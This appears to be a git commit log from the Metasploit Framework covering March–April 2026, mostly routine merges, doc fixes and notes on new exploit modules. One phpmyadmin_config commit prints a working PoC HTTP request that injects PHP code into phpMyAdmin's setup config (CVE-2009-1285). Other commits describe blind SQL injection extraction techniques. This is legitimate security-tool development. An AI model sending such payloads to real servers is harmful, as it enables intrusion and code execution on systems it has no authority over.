jenkins-metasploit 2038b133de automatic module_metadata_base.json update 2026-04-02 16:58:50 +00:00
jheysel-r7 0f156364eb Merge pull request #21158 from sfewer-r7/CVE-2026-20127
Add auxiliary module for Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability (CVE-2026-20127)
2026-04-02 09:50:22 -07:00
jenkins-metasploit aee4762d46 automatic module_metadata_base.json update 2026-04-02 13:22:16 +00:00
Spencer McIntyre d11e41ddfb Merge pull request #21143 from SaiSakthidar/php-meterpreter-tcp-server-tests
Php meterpreter tcp server tests
2026-04-02 09:12:37 -04:00
jenkins-metasploit 8858537ade Bump version of framework to 6.4.126 2026-04-02 10:55:06 +00:00
jenkins-metasploit 3f83860a9b automatic module_metadata_base.json update 2026-04-02 10:24:13 +00:00
cgranleese-r7 f877a6e9bd Merge pull request #21199 from Hemang360/fix-wordpress-module-scanner
Fix LocalJumpError in wordpress module scanner
2026-04-02 11:14:55 +01:00
jenkins-metasploit a36144b278 automatic module_metadata_base.json update 2026-04-02 09:57:33 +00:00
cgranleese-r7 9a8457585e Additional check for html_content
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-02 10:52:57 +01:00
Diego Ledda 5e3789d16a Merge pull request #21048 from zeroSteiner/feat/mod/socks-proxy/fiber-update
Update the SOCKS proxy to use the new RelayManager
2026-04-02 05:48:06 -04:00
SaiSakthidar 75f94fd508 Revert temporary fork/branch references in acceptance workflow 2026-04-02 09:34:04 +05:30
jenkins-metasploit 0503bbd8b7 automatic module_metadata_base.json update 2026-04-01 21:05:46 +00:00
Spencer McIntyre 8786dab27a Merge pull request #21218 from adfoster-r7/fix-crash-with-frozen-string-literals
Fix crash with frozen string literals
2026-04-01 16:56:05 -04:00
adfoster-r7 63e54a9291 Fix crash with frozen string literals 2026-04-01 20:34:46 +01:00
SaiSakthidar 62eecaeace Bump metasploit-payloads to 2.0.244 2026-04-01 19:25:21 +00:00
jenkins-metasploit 6890d8d1de automatic module_metadata_base.json update 2026-04-01 19:18:05 +00:00
adfoster-r7 21fbe713ef Merge pull request #21214 from adfoster-r7/add-additional-validation-to-db-import
Add additional validation to db_import
2026-04-01 20:03:59 +01:00
Spencer McIntyre 1d41776cf8 Merge pull request #21032 from Nayeraneru/UserInitMprLogon
windows persistence userinit_mpr_logon
2026-04-01 14:59:36 -04:00
jenkins-metasploit 653c92254b automatic module_metadata_base.json update 2026-04-01 18:43:22 +00:00
Spencer McIntyre 3f757d9880 Merge pull request #21172 from bwatters-r7/feature/x86_windows_fetch
Add HTTP and HTTPS fetch payloads for Windows x86
2026-04-01 14:34:36 -04:00
Spencer McIntyre e88bc5d621 Update payload cached sizes 2026-04-01 12:45:31 -04:00
Spencer McIntyre cdb01c692f Add tests 2026-04-01 12:45:31 -04:00
Spencer McIntyre 8083693105 Join the client thread in #stop 2026-04-01 12:45:30 -04:00
Spencer McIntyre 096913343d Switch to the fiber relay manager 2026-04-01 12:45:30 -04:00
Spencer McIntyre 24b8b730e9 Update rex-core to 0.1.36 2026-04-01 12:45:30 -04:00
Spencer McIntyre 34c7a18ef4 Merge pull request #21217 from dineshg0pal/fix/small-typo-fixes
Fix: small typo's in Documentation
2026-04-01 12:38:25 -04:00
Dinesh b668069682 fix: corrected SHA12 to SHA512 2026-04-01 21:32:28 +05:30
Dinesh 7bdfdf9703 fix: removed extra "use" in cmd lines 2026-04-01 21:29:21 +05:30
Dinesh fe0c7e4e97 fix: removed "are" duplicate 2026-04-01 21:25:00 +05:30
Dinesh 2d4c3e748e fix: removed duplicate "which" 2026-04-01 21:22:38 +05:30
bwatters-r7 1f1ca87753 Update specs to reflect the new constraints for FETCH_COMMAND values 2026-04-01 10:35:12 -05:00
adfoster-r7 acefa87790 Add additional validation to db_import 2026-04-01 10:47:50 +01:00
adfoster-r7 79ea88e2f9 Merge pull request #21188 from adfoster-r7/fix-crash-on-older-ruby-versions
Fix crash on older Ruby versions
2026-04-01 10:46:23 +01:00
Nayeraneru 6a1c6437b9 msftidy 2026-03-31 23:49:08 +02:00
Nayera 15845faf63 Remove writable_dir method 2026-03-31 23:46:09 +02:00
Nayeraneru 609866dc94 add doc 2026-03-31 23:46:09 +02:00
Nayera 70c5496fe5 windows persistence userinit_mpr_logon 2026-03-31 23:46:09 +02:00
bwatters-r7 ca21ae4177 Clean up FETCH_COMMAND options 2026-03-31 15:41:36 -05:00
jenkins-metasploit 24622613d2 automatic module_metadata_base.json update 2026-03-31 19:58:26 +00:00
Spencer McIntyre 839fc52011 Merge pull request #21004 from EclipseAditya/fix/20899-registry-trailing-backslash
Fix trailing backslash in shell registry operations
2026-03-31 15:49:09 -04:00
jenkins-metasploit 54afd312a8 automatic module_metadata_base.json update 2026-03-31 16:18:43 +00:00
Christophe De La Fuente 09a59af789 Merge pull request #21069 from Chocapikk/add-module-freescout-htaccess-rce 2026-03-31 18:09:30 +02:00
Spencer McIntyre 8a6dd99db6 Merge pull request #21209 from dineshg0pal/fix/small-typo-fixes
Fix: minor typos in Pivoting-in-Metasploit.md
2026-03-31 11:06:51 -04:00
Dinesh 600a07d1dd Update docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-03-31 20:04:13 +05:30
Dinesh 6554aa6416 fix: typo mistake "UPD" changed to "UDP"
At the file "Pivoting-in-Metasploit.md" -----> typo mistake of "UPD" changed to correct "UDP"
2026-03-31 19:24:15 +05:30
Dinesh 7186a16647 fix: removing duplicate "final"
At the "metasploit-framework/docs/metasploit-framework/Pivoting-in-Metasploit.md" --------> At the topic "proxychain-ng setup" ---> duplicate "final" word is removed
2026-03-31 19:20:13 +05:30
g0t mi1k 38d8ea7937 phpmyadmin_config: Make rubocop happy 2026-03-31 14:49:03 +01:00
g0t mi1k 806c889225 php_include: Tweak check() 2026-03-31 14:46:11 +01:00
g0t mi1k 92c068d9f7 php_include: Consistencies
Sorry, not sorry
2026-03-31 14:46:00 +01:00
jenkins-metasploit 95f0ea92f0 automatic module_metadata_base.json update 2026-03-31 13:41:57 +00:00
cgranleese-r7 6f770d0288 Merge pull request #21208 from adfoster-r7/update-report-note-calls
Fix deprecation notices when reporting notes
2026-03-31 14:32:46 +01:00
jenkins-metasploit ad7a513407 automatic module_metadata_base.json update 2026-03-31 13:17:54 +00:00
msutovsky-r7 a79c21535d Land #20999, removes older persistence module
Remove obsolete windows/local/persistence in favor of windows/persistence/registry
2026-03-31 15:09:04 +02:00
jenkins-metasploit ba059417a3 automatic module_metadata_base.json update 2026-03-31 12:57:11 +00:00
msutovsky-r7 6d4b268f9f Land #21029, adds module for Grav CMS (CVE-2025-50286)
Adds exploit module for Grav CMS (CVE-2025-50286)
2026-03-31 14:47:44 +02:00
cgranleese-r7 e5e18383a2 Merge pull request #21187 from Devansh7006/patch-1
Improve HTTP PUT module documentation
2026-03-31 13:03:56 +01:00
jenkins-metasploit 6fe38a377c automatic module_metadata_base.json update 2026-03-31 11:44:17 +00:00
adfoster-r7 3846b087ad Update report note calls 2026-03-31 12:39:21 +01:00
adfoster-r7 80d01cd0c1 Merge pull request #21207 from zeroSteiner/fix/mod/enum-protections/report-hash
Fix a deprecation notice when reporting notes
2026-03-31 12:35:50 +01:00
jenkins-metasploit b41522b3f7 automatic module_metadata_base.json update 2026-03-31 11:08:55 +00:00
adfoster-r7 b24b23fcbf Merge pull request #21138 from g0tmi1k/rhosts
[Bug Fix] Auxiliary: Check if module is meant to have rhosts
2026-03-31 12:00:36 +01:00
cgranleese-r7 55152da83a Merge pull request #21186 from Devansh7006/add-wordpress-pingback-doc
Add documentation for wordpress_pingback_access module
2026-03-31 11:40:24 +01:00
adfoster-r7 c0a9794d7f Update tests and module that needed the rhost option set 2026-03-31 11:40:13 +01:00
Devansh7006 b9666f5f0e Improve formatting and clarity of WordPress pingback module
Reformatted the verification steps and options for clarity. Removed redundant lines and added example usage.
2026-03-31 12:40:19 +05:30
Devansh7006 d3a1bdaa88 Fix HTTP PUT module documentation formatting and structure
Updated example usage and added details for the PUT action.
2026-03-31 12:28:17 +05:30
g0t mi1k 24ee2a9ce5 Auxiliary: Check if module is meant to have rhosts 2026-03-31 07:08:03 +01:00
g0t mi1k e025f94f78 phpmyadmin_config: Add report_service() support 2026-03-31 07:07:49 +01:00
g0t mi1k 3a1d34e300 phpmyadmin_config: Ordering matters (check vs exploit) 2026-03-31 07:07:49 +01:00
g0t mi1k 18e4c8e28d phpmyadmin_config: Misc ruby format tweaks
This is based on MR feedback
2026-03-31 07:07:49 +01:00
g0t mi1k 8938ee75e5 phpmyadmin_config: Another <= v3.1.3.1 (CVE-2009-1285)
CVE-2009-1285 has two vulns for v3.1.x

## PoC

```
POST /setup/config.php?type=post HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Content-Type: application/x-www-form-urlencoded
Cookie: phpMyAdmin=3d88785a775a6bdd4a4eee4d7ce5fe7b99a802bb; pma_lang=en-utf-8; pma_charset=utf-8; pma_mcrypt_iv=Mc1O5ByaScc%3D; phpMyAdmin=aeb5279f061348c557a7c366abb67deefe14b535
Content-Length: 109

token=e555e9ff29b23a81ff9d20affa616a8b&eol=unix&textconfig=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E&submit_save=Save
```
2026-03-31 07:07:49 +01:00
g0t mi1k cc3f76d586 phpmyadmin_config: Reformat code 2026-03-31 07:07:49 +01:00
g0t mi1k bf28b0d3e7 phpmyadmin_config: Add v3.1.x
As it turns out, this is part of CVE-2009-1285 (<= v3.1.3.1)
This does not exploit CVE-2009-1151 for v3.1.x
2026-03-31 07:07:49 +01:00
g0t mi1k d6914f0812 phpmyadmin_config: Reformat exploit 2026-03-31 07:07:41 +01:00
g0t mi1k 6cc3e391f7 phpmyadmin_config: Add check 2026-03-31 07:05:54 +01:00
g0t mi1k 91ceaad082 php_include: Remove duplicate code 2026-03-31 06:55:59 +01:00
g0t mi1k 158bd4f6b2 php_include: Add POST support for check() 2026-03-31 06:49:17 +01:00
g0t mi1k 93d735b07c php_include: Sends headers using check() 2026-03-31 06:44:48 +01:00
g0t mi1k b5b92ce0fe php_include: POSTDATA -> FORMDATA 2026-03-31 06:40:51 +01:00
g0t mi1k 09c01a6979 php_include: PATH -> ROOTDIR 2026-03-31 06:39:23 +01:00
g0t mi1k b0f3dd9fe3 php_include: XXpathXX -> !INJECT! 2026-03-31 06:38:52 +01:00
Spencer McIntyre 1c93bb4848 Fix a deprecation notice when reporting notes 2026-03-30 17:51:41 -04:00
jenkins-metasploit 71d4faa26c automatic module_metadata_base.json update 2026-03-30 21:49:12 +00:00
Spencer McIntyre 402502b262 Merge pull request #21194 from bcoles/enum_protections
Improve post/linux/gather/enum_protections module
2026-03-30 17:40:26 -04:00
jenkins-metasploit 466a63843d automatic module_metadata_base.json update 2026-03-30 21:26:59 +00:00
Spencer McIntyre 217f98b74d Merge pull request #21181 from aryan9190/docs/appletv-display-image
Add YARD documentation for AppleTV display image module
2026-03-30 17:18:19 -04:00
bwatters-r7 a0594483b0 Specs for the spec gods 2026-03-30 15:57:06 -05:00
adfoster-r7 c9ea7506ed Merge pull request #21203 from dineshg0pal/fix/small-typo-fixes
Fix: minor syntax and formatting issues in documentation
2026-03-30 20:51:02 +01:00
cgranleese-r7 06520cb1ad Merge pull request #21201 from aryan9190/docs/rex-post-io
Add YARD documentation for Rex::Post::IO class
2026-03-30 16:23:27 +01:00
Dinesh 44d15b4d84 fix: added "/" to the <html> to prevent syntax logic
added the "/" to the <html> at the  title ---> "Parsing HTML with Nokogisi ------> to prevent html syntax logic
2026-03-30 19:35:36 +05:30
Dinesh 2c2e07e81f fix: removed duplicate "is"
from the "Metasploit-URL-support-proposal.md ------> removed the duplicate "is" from the sub-topic "Multiple Options"
2026-03-30 19:32:11 +05:30
jenkins-metasploit 35831dfd30 automatic module_metadata_base.json update 2026-03-30 13:59:04 +00:00
Dinesh a21527411f fix: invalid JSON syntax
At the "Writing-External-Metasploit-framework.wiki/Writing-External-Metasploit-Modules.md ----> added "," to prevent misunderstanding of JSON format
2026-03-30 19:27:02 +05:30
adfoster-r7 438b8e0875 Merge pull request #21102 from zeroSteiner/fix/re-add-20989
Reapply "This adjusts module options that need a routable address"
2026-03-30 14:50:05 +01:00
cgranleese-r7 7e4bad55cc Merge pull request #21202 from adfoster-r7/update-bofloader-logo-location
Update bofloader logo location
2026-03-30 13:17:48 +01:00
Aryan Yadav 57aacaa2b2 Add YARD documentation for Rex::Post::IO class 2026-03-30 16:33:01 +05:30
adfoster-r7 1271eed27d Update bofloader logo location 2026-03-30 11:33:49 +01:00
adfoster-r7 113598b90e Merge pull request #21200 from dineshg0pal/fix/go-syntax-module
fix: correct syntax errors in Go module template
2026-03-30 11:09:53 +01:00
Dinesh be2b60e873 fix: correct syntax errors in Go module template
updated the "metasploit-framework/docs/metasploit-framework.wiki/Writing-External-Golang-Modules.md, with the ">" syntax correction
2026-03-30 12:26:54 +05:30
Hemang360 0ed8a87167 Fix LocalJumpError in wp_perfect_survey_sqli 2026-03-30 01:08:00 +05:30
bcoles b17a5727b5 Improve post/linux/gather/enum_protections module
* Add system hardening checks
* Add detection for modern security tools
* Add module documentaiton
2026-03-29 15:07:56 +11:00
adfoster-r7 15f84bc216 Merge pull request #21073 from Hemang360/fix-duplicate-job
Fix duplicate handler jobs caused by stop_handler on repeated run
2026-03-28 13:22:39 +00:00
arkaprabhachakraborty 1ecc346d65 Remove target_uri method and replace with datastore['TARGETURI'] to address override issues
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-03-28 01:55:44 +05:30
Valentin Lobstein 2a1ebdb996 Update modules/exploits/multi/http/freescout_htaccess_rce.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2026-03-27 19:30:47 +01:00
jenkins-metasploit 042cd310a0 automatic module_metadata_base.json update 2026-03-27 16:47:50 +00:00
adfoster-r7 20bb912515 Merge pull request #21023 from g0tmi1k/os_cmd_exec
Add: exploits/multi/http/os_cmd_exec
2026-03-27 16:38:03 +00:00
Nayeraneru e26330a4fb Fix CI specs 2026-03-27 15:06:16 +02:00
adfoster-r7 cc143fa463 Fix crash on older Ruby versions 2026-03-27 13:00:25 +00:00
cgranleese-r7 2162a9df0b Merge pull request #21145 from Nayeraneru/docs/msf-auxiliary-auth_brute
Enhance method documentation in auth_brute.rb
2026-03-27 11:52:21 +00:00
Devansh7006 bccbf35950 Enhance documentation for WordPress pingback module
Updated verification steps and added example run for clarity.
2026-03-27 17:07:24 +05:30
jenkins-metasploit 7770bd4475 automatic module_metadata_base.json update 2026-03-27 11:32:03 +00:00
cgranleese-r7 971cb93944 Merge pull request #21097 from g0tmi1k/ftp
auxiliary/scanner/ftp/anonymous: Add report_service()
2026-03-27 11:23:35 +00:00
Devansh7006 e56610b530 Enhance documentation for HTTP PUT scanner module
Added verification steps and detailed options for HTTP PUT scanner.
2026-03-27 16:45:55 +05:30
Devansh7006 63ad9b06bf Refactor WordPress Pingback Access documentation
Removed redundant sections and improved formatting for clarity.
2026-03-27 16:39:37 +05:30
cgranleese-r7 655e21af7b Merge pull request #21150 from Nayeraneru/docs/msf-core-payload-adapter-fetch.rb
Enhance documentation for fetch adapter methods
2026-03-27 11:07:02 +00:00
cgranleese-r7 ab4f24db5d Merge pull request #21149 from Adithyadspawar/add-auxiliary-scanner-docs
Add documentation for auxiliary scanner modules
2026-03-27 11:02:43 +00:00
cgranleese-r7 ba51260609 Adds missing # 2026-03-27 11:00:40 +00:00
cgranleese-r7 e089cf28a4 Merge pull request #21144 from Nayeraneru/docs/msf-auxiliary-web-http-yard
Enhance documentation for HTTP module methods
2026-03-27 10:53:43 +00:00
cgranleese-r7 8c98721044 Merge pull request #21185 from adfoster-r7/additional-agents-md-file-edits
Additional agents md file edits
2026-03-27 10:05:44 +00:00
Devansh7006 8e2e293062 Improve HTTP PUT module documentation
Updated the documentation for the HTTP PUT File Upload Scanner module to clarify usage and options.
2026-03-27 15:33:23 +05:30
Devansh7006 93fb3b464b Add WordPress Pingback Access Scanner documentation
This document outlines the WordPress Pingback Access Scanner module, its verification steps, options, and scenarios for use in security assessments.
2026-03-27 15:04:49 +05:30
x1o3 d12e3945fe plugin version parsing and check logic improvement, msftidy & rubocop compliant 2026-03-27 11:47:30 +05:30
x1o3 de81c5f0dc plugin version parsing and check logic improvement, msftidy & rubocop compliant 2026-03-27 11:45:20 +05:30
Chocapikk 140b58f429 Fix: address PR review feedback for freescout htaccess rce module 2026-03-27 00:34:22 +01:00
Valentin Lobstein 3f718d77b4 Update modules/exploits/multi/http/freescout_htaccess_rce.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2026-03-27 00:29:57 +01:00
adfoster-r7 316c2868a5 Additional agents md file edits 2026-03-26 21:31:24 +00:00
SaiSakthidar c6529e83cd Merge branch 'rapid7:master' into php-meterpreter-tcp-server-tests 2026-03-27 00:57:05 +05:30
arkaprabhachakraborty 26a73b060d Resolve rubocop errors and warnings. Address copilot comments on docs and code quality.
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-03-27 00:43:23 +05:30
Spencer McIntyre 700d063645 Implement copilot feedback 2026-03-26 14:43:33 -04:00
Spencer McIntyre 93e3616115 Add tests and normalization 2026-03-26 14:43:33 -04:00
Spencer McIntyre 56869f4e0b Mark 0.0.0.0 as an acceptable local address 2026-03-26 14:43:33 -04:00
Spencer McIntyre b743296f48 Reapply "This adjusts module options that need a routable address"
This reverts commit 628275ef59.
2026-03-26 14:43:31 -04:00
Hemang360 e76c21d0db Add tests for #stop_handler 2026-03-26 23:26:28 +05:30
Spencer McIntyre 308b7277a1 Apply suggestion from @adfoster-r7
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2026-03-26 13:21:42 -04:00
sfewer-r7 aa84007608 dont mix vprint_status and teh slient flag. improve some of the print message for better consistency 2026-03-26 15:08:29 +00:00
Aryan Yadav 3da962b6a4 Add YARD documentation for AppleTV display video module 2026-03-26 20:30:40 +05:30
sfewer-r7 86518493a3 dont rescue StandardError here, if it ever gets raised, let if bubble up 2026-03-26 14:56:22 +00:00
sfewer-r7 057ee46e03 use privkey_path as a better var name 2026-03-26 14:55:09 +00:00
Chocapikk 222e1a28ab Fix: Address Copilot review feedback on blind extraction and calibration
- Widen blind_dump_data bisection range from 0..127 to 0..255 for
  binary-safe byte extraction, use Encoding::BINARY for chr output
- Revert read_from_file to positional param (binary = false) to stay
  consistent with MSSQL/PostgreSQL implementations
- Add elapsed <= 0 guard and .clamp on calibrated benchmark iterations
- Add unit specs for blind_detect_length and blind_dump_data covering
  zero-length, ASCII, long strings, and high bytes (>127)
- Fix rubocop: remove leading blank line, use single-quoted strings
2026-03-26 15:53:51 +01:00
sfewer-r7 f857ea77c9 get rid of STORE_SSH_KEY_FILES as the private key will be in loot anyway 2026-03-26 14:53:25 +00:00
Aryan Yadav 2d69fb98f3 Add YARD documentation for AppleTV display image module 2026-03-26 20:17:21 +05:30
sfewer-r7 bdb99b20ae fix reference arrays 2026-03-26 14:40:59 +00:00
jenkins-metasploit eefd7c89ab automatic module_metadata_base.json update 2026-03-26 14:40:19 +00:00
cgranleese-r7 8107adf1a7 Merge pull request #21090 from g0tmi1k/report_service
Add report_service()
2026-03-26 14:31:36 +00:00
cgranleese-r7 6562cb6b2d Merge pull request #21175 from adfoster-r7/add-additional-markdown-notes
Add additional markdown notes
2026-03-26 13:33:42 +00:00
sfewer-r7 51b5f582ad these extensions are not required 2026-03-26 13:29:05 +00:00
jenkins-metasploit de67e4341a Bump version of framework to 6.4.125 2026-03-26 12:41:59 +00:00
sfewer-r7 c7708416e5 potential fix for loading openssl on win 2026-03-26 12:27:07 +00:00
sfewer-r7 75f3fcd788 rubocop nit, add newline 2026-03-26 12:10:08 +00:00
Stephen Fewer ce921c8e65 verify openssl lib exist in the current path before we try to open it
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-03-26 12:06:31 +00:00
Stephen Fewer 493bc214dc add several absolute paths to OpenSSL for mac
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-03-26 12:05:13 +00:00
Stephen Fewer 3b3b54a217 Update modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-03-26 12:00:16 +00:00
g0t mi1k 17161c42e2 Make Rubocop happy 2026-03-25 13:39:20 +00:00
g0t mi1k 89af3ad558 Sync datastore_headers
Note: This code was suggested by a LLM (Copilot) in the MR
2026-03-25 13:32:46 +00:00
adfoster-r7 df6c144598 Add extra requirements 2026-03-25 13:12:39 +00:00
adfoster-r7 e7eb5f760b Add additional markdown notes 2026-03-24 20:17:29 +00:00
g0t mi1k 51f36982c7 Add: exploits/multi/http/os_cmd_exec
A lot of this was based on: exploits/unix/webapp/php_eval
2026-03-24 20:01:30 +00:00
SaiSakthidar 979dea126a Update .github/workflows/shared_meterpreter_acceptance.yml
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2026-03-24 22:12:15 +05:30
bwatters-r7 be2590af6f Add HTTP and HTTPS fetch payloads for Windows x86 2026-03-23 19:19:00 -05:00
Valentin Lobstein 20d795d91e Fix: Address PR review feedback
Module changes (cgranleese-r7):
- Remove VERBOSE from DefaultOptions
- Make COUNT required with default 0
- Simplify COUNT usage since it's now always present

Specs (bwatters-r7):
- Expand mysqli_common_spec.rb with tests for version, current_database,
  current_user, enum_database_names, enum_table_names, enum_table_columns,
  sleep_call, hex_encode_strings, hex/base64 encoders, time_blind_payload,
  and blind_detect_length binary search
- Expand mysqli_time_based_spec.rb with tests for IF/sleep payload
  generation, SqliDelay usage, test_vulnerable, and Common inheritance
- Add mysqli_benchmark_based_blind_spec.rb with tests for BENCHMARK
  multiplication payload, calibrated iterations, SHA1 seed randomization,
  test_vulnerable, and calibrate
2026-03-23 01:58:29 +01:00
arkaprabhachakraborty ae71513ce1 Add feature to create tickets and grab ticket number when TICKET_NUMBER is not specified
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-03-21 19:02:39 +05:30
g0t mi1k 8922255cc9 Add report_service() 2026-03-20 20:06:01 +00:00
sfewer-r7 f822f98438 add in aux module for CVE-2026-20127 2026-03-20 12:33:24 +00:00
Nayeraneru 242cf2894f Fix reused option visibility mutations 2026-03-20 09:44:56 +02:00
Nayera bad8ddc605 Enhance documentation for fetch adapter methods 2026-03-19 21:45:55 +02:00
Adithyadspawar 6326f14768 Add documentation for 5 auxiliary scanner modules 2026-03-19 22:59:00 +05:30
Adithyadspawar 20c265dc32 Add documentation for 5 auxiliary scanner modules
Add module documentation for:
- auxiliary/scanner/http/apache_activemq_traversal
- auxiliary/scanner/http/drupal_views_user_enum
- auxiliary/scanner/http/coldfusion_version
- auxiliary/scanner/http/elasticsearch_traversal
- auxiliary/scanner/ftp/bison_ftp_traversal

Fixes #12389
2026-03-19 20:19:26 +05:30
Nayera aabb39416f Enhance method documentation in auth_brute.rb 2026-03-19 07:38:30 +02:00
Nayera 7aaaa6e12d Enhance documentation for HTTP module methods 2026-03-19 06:44:41 +02:00
SaiSakthidar 76b6d8b161 Update PHP meterpreter socket channel acceptance expectations 2026-03-18 17:49:13 +00:00
SaiSakthidar 929c977fcf Update PHP meterpreter socket channel acceptance expectations 2026-03-18 17:43:46 +00:00
BootstrapBool 31b58e7deb msftidy changes 2026-03-14 23:38:04 -04:00
BootstrapBool 5b9dc0f5ed Merge branch 'master' into camaleon_cms_cve_2024_46987 2026-03-14 23:33:27 -04:00
BootstrapBool aa2725150c Removes python camaleon module, adds ruby camaleon module
Updates documentation
2026-03-14 23:32:44 -04:00
Valentin Lobstein 3414611a3d Refactor: Use inherited SSL option from HttpClient instead of HTTPSSL 2026-03-14 00:07:28 +01:00
Valentin Lobstein c5c6c34232 Refactor: Remove HTTPSSL option, auto-detect SSL from port 443 2026-03-14 00:04:49 +01:00
Valentin Lobstein d01a2689bb Fix: Use HttpClient bind_call for full HTTP feature inheritance
Replace standalone Rex::Proto::Http::Client with bind_call on
HttpClient's connect method to bypass SMTPDeliver MRO conflict
while preserving SSL, proxy, basic auth, and vhost support.
Add HTTPSSL option for HTTPS targets.
2026-03-14 00:02:04 +01:00
Valentin Lobstein db3654eebf Fix: Address Copilot review feedback and fix cmd/dropper targets
- Fix http_send: use standalone Rex::Proto::Http::Client to avoid
  SMTPDeliver/HttpClient connect() method conflict
- Fix cmd/dropper PHP stub: remove double $$ variable (vars[:cmd_varname]
  already includes $ prefix)
- Fix cmd/dropper unlink: use cleanup POST param instead of inline
  @unlink to preserve shell across multiple stager requests
- Fix wait_for_cron: use .to_i % fetch for correct modulo calculation
- Fix dir_exists?: use res&.redirect? instead of res&.code == 301
- Fix docs: RHOSTS -> RHOST (SMTPDeliver registers singular RHOST)
- Remove manual Date header (SMTPDeliver handles it)
- Update scan_paths comment to reflect MD5 digit extraction
- Replace php_exec_cmd with manual preamble + system_block stub
2026-03-13 23:38:30 +01:00
Spencer McIntyre 35d2906c2a Update grammar fix CWE ID 2026-03-13 09:52:49 -04:00
Spencer McIntyre 29655b0b3f Expand the private_type definition logic 2026-03-13 09:50:19 -04:00
Valentin Lobstein ee2ee34b9e Refactor: Extract shared logic in exploit method for openDCIM module
Factor out duplicated print_status and backup_config calls, extract
trigger_exec and cleanup_config helpers for readability.
2026-03-12 20:56:33 +01:00
Valentin Lobstein f34a0b5d31 Fix: Address PR review feedback for openDCIM module
Add ARTIFACTS_ON_DISK side effect and fetch payload note in docs.
2026-03-12 20:44:19 +01:00
g0t mi1k 51451cd58d *FTPD naming consistency 2026-03-11 14:19:23 +00:00
g0t mi1k 47518cabc6 auxiliary/scanner/ftp/anonymous: Improve report_service()
Previously would only log service if FTP service was working AND anonymous enabled.
Now it will log if FTP service is working regardless of anonymous.

Note, will NOT include the FTP banner when anonymous is enabled. Only disabled!
2026-03-11 14:16:21 +00:00
LucasCsmt 3f25048d9b Merge branch 'master' into multi/http/churchcrm_db_restore_rce 2026-03-11 09:41:33 +01:00
LucasCsmt 4ebef4b3e2 Changing a letter in order to have conformity 2026-03-11 09:14:14 +01:00
x1o3 146911bb3d rubocop & msftidy compiant 2026-03-11 12:59:36 +05:30
x1o3 de72dcb88a fixes review feedback 2026-03-11 12:56:14 +05:30
BootstrapBool 25f6f6b7ae Moves camaleon_traversal module to auxiliary/gather
Adds missing options to documentation

Makes verbose option not required

Changes VHOST option type - some reason "address" type domain names were
marked as "invalid"
2026-03-07 18:36:36 -05:00
BootstrapBool d65cc5694f Adds camaleon_traversal module/documentation 2026-03-06 23:16:52 -05:00
Valentin Lobstein a66a8788d9 Docs: Add GHSA, OSV, and ATT&CK reference examples 2026-03-07 04:27:23 +01:00
Valentin Lobstein 6154d53e9a Fix: Use short PHP variable for fetch payload to reduce size
Use a randomized variable name to store the file path instead of
repeating the full path inline. Remove unnecessary spaces between
PHP statements.
2026-03-07 03:59:42 +01:00
Valentin Lobstein 9283072822 Fix: Rubocop style fixes for churchcrm module 2026-03-07 02:57:05 +01:00
Valentin Lobstein 3eb814de90 Fix: Refactor ChurchCRM unauthenticated RCE module
- Upgrade rank to ExcellentRanking, prepend AutoCheck
- Add vulnerability discoverer Arthur Valverde (uartu0) to authors
- Fix GHSA reference format with repo parameter
- Replace InitialAutoRunScript with inline unlink(__FILE__) for PHP
  targets and post-staging rm for CmdStager target
- Randomize DB_SERVER_PORT and GET parameter name
- Simplify check method, extract setup_uri, DRY build_config_payload
- Remove redundant register_options for TARGETURI
2026-03-07 02:34:58 +01:00
Valentin Lobstein f27318b54b Fix: Resolve rubocop lint issues in avideo_catname_sqli
Remove extra blank line, rename @sqli to @setup_sqli to match
memoized method name convention.
2026-03-07 00:17:37 +01:00
Valentin Lobstein a277de1308 Fix: Correct version in documentation scenario title 2026-03-07 00:13:10 +01:00
Valentin Lobstein ba183d456d Fix: Remove BenchmarkProbeIterations from global SQLi options
MySQL-specific option should not pollute all SQLi modules.
Hardcode probe iteration count in BenchmarkBasedBlind instead.
2026-03-07 00:09:44 +01:00
Valentin Lobstein 62f4687cb4 Add AVideo catName blind SQLi credential dump (CVE-2026-28501)
Add auxiliary/gather/avideo_catname_sqli module exploiting unauthenticated
SQL injection via JSON body in objects/videos.json.php. Uses BENCHMARK()
time-based blind injection since SLEEP() is blocked by sqlDAL prepare().

Add MySQLi::BenchmarkBasedBlind class with auto-calibrated BENCHMARK()
iterations using real table subqueries to match extraction workload cost.

Refactor blind_detect_length and blind_dump_data from bit-by-bit extraction
to binary search (bisection), avoiding bitwise & operator issues with
prepare() and matching sqlmap's extraction strategy.

Extract test_vulnerable into TimeBasedBlindMixin, add overridable
time_blind_payload and sleep_call methods for clean subclass override.

Fix pre-existing rubocop issues in touched mixin files (Style/Documentation,
OptionalBooleanParameter, MultilineBlockChain, TrailingWhitespace).
2026-03-07 00:07:52 +01:00
Hemang360 1aab8ec385 Fix duplicate handler jobs on repeated run 2026-03-07 02:52:14 +05:30
LucasCsmt 4ca2b22dff Adding documentation to the module 2026-03-06 10:18:58 +01:00
LucasCsmt 6026e9f971 Correcting the version and the CVE code 2026-03-06 10:18:25 +01:00
bwatters-r7 34cc1a663c Also remove ms_icpr_spec that had the same tests as the other spec file removed before 2026-03-05 15:44:20 -06:00
bwatters-r7 f2e98c76d8 Move specs for create_csr and build_on_belhalf_of to new location since we moved them. 2026-03-05 15:19:31 -06:00
